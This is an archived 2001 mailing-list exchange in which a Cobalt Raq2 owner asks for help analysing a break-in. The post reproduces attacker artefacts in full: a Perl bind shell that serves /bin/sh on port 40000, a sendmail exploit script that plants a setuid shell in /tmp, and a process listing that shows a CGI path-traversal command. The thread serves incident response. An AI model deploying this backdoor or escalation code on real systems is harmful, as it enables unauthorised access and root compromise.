[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] Raq2 Hack
- Subject: RE: [cobalt-users] Raq2 Hack
- From: "Sim Ayers" <sim@xxxxxxxxxxxx>
- Date: Sun Aug 19 03:25:05 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Hacked Raq2
Sent: Sunday, August 19, 2001 9:59 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Raq2 Hack
Hello all,
Well, it seems that I've had an intruder on my Raq2. What I'm trying to
figure out, is how he got in. I have all the important patches applied and
I've shutdown telnet in favor of running OpenSSH 2.9. I also run logcheck
and portsentry and usually keep a close eye on things.
What I'd like to do, is just post some of the stuff I've found and see if
any of the security guru's might have an idea of what happened so I can
close things up. I realize that a OS Restore might be the only option, but I
would like to explore the depth of this h4x0r's intrusion.
Here's the processes that were running. It appears he only had the
privileges of HTTPD:
httpd 19108 0.0 0.6 3012 864 ? S NAug 17 0:00 sh -c
/home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../..
/../../../../../../../../../
httpd 19112 0.0 1.3 4748 1740 ? S NAug 17 0:00 perl /tmp/shell.pl
httpd 19130 0.0 0.0 0 0 ? Z NAug 17 0:00 (sh <zombie>)
httpd 19425 0.0 1.0 3720 1280 ? S NAug 17 0:29 ./psybnc
httpd 20481 0.0 0.0 0 0 ? Z NAug 17 0:00 (sh <zombie>)
httpd 20562 0.0 0.0 0 0 ? Z NAug 17 0:00 (sh <zombie>)
httpd 22086 0.0 0.0 0 0 ? Z NAug 17 0:00 (sh <zombie>)
httpd 22228 0.0 0.0 0 0 ? Z NAug 17 0:00 (sh <zombie>)
I also see that he had some kind of IRC program running.
Here are the contents of the shell.pl that he had in /tmp:
#!/usr/bin/perl
require 5.002;
use Socket;
$protocol = getprotobyname('tcp');
socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socketn";
setsockopt(S, SOL_SOCKET, SO_REUSEA
DDR, 1);
bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bindn";
listen(S, 3) || die "can't listenn";
while (1) { YOP: accept (THC, S) || goto YOP;
if (! ($pid=fork))
{ goto BYE if (! defined $pid);
open STDIN, "<&THC"; open STDOUT, ">&THC";
open STDERR, ">&THC";
exec "/bin/sh -i" || print THC "couldn't spawn shelln";
close THC; exit 0;}
else {BYE: close THC;}}
Here are a list of the files he put into /tmp:
1 httpd httpd 983040 May 22 10:07 psyBNC.tar
1 httpd httpd 639341 Aug 19 01:13 psybnc
1 httpd httpd 10240 Nov 7 1999 sendmail-8.9.3.tar
2 httpd httpd 1024 Aug 19 01:48 sendmail89x
1 httpd httpd 559 Aug 17 19:30 shell.pl
1 httpd httpd 1 Aug 17 21:25 suid.sh
The directory sendmail89x has the following files in it:
529 Jul 2 1999 exploit.sh
1287 Jul 1 1999 sendmail.c
Here are the contents of exploit.sh:
#!/bin/sh
# rpmmail (sendmail 8.9.3/8.9.1 procmail 3.10.x)
# by icesk, greetz to that triq ass bitch from ATR, obsolete, and #b4b0
echo "[icesk] createing suid shellscript"
echo <<EOF > /tmp/suid.sh
#!/bin/sh
cp /bin/sh /tmp/sh;chmod +s /tmp/sh
EOF
chmod +x /tmp/suid.sh
echo "[icesk] `ls -l /tmp/suid.sh`"
echo "[icesk] compileing exploit"
gcc -o sendmail sendmail.c
echo "[icesk] expl01t1ng m41l f34r!@$"
./sendmail 127.0.0.1 /tmp/suid.sh
echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"
echo "[icesk] done."
If anyone could help me understand this exploit a little more and maybe give
me some ideas on where to look for his entry point, I would really
appreciate it.
TIA,
h4ck3d
If the intruder only had privileges of HTTPD, then it looks like he used
someone's
file upload script, (use CGI), which defaults to uploading to /tmp.
Did the shell.pl ever run to completion?
Sim
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users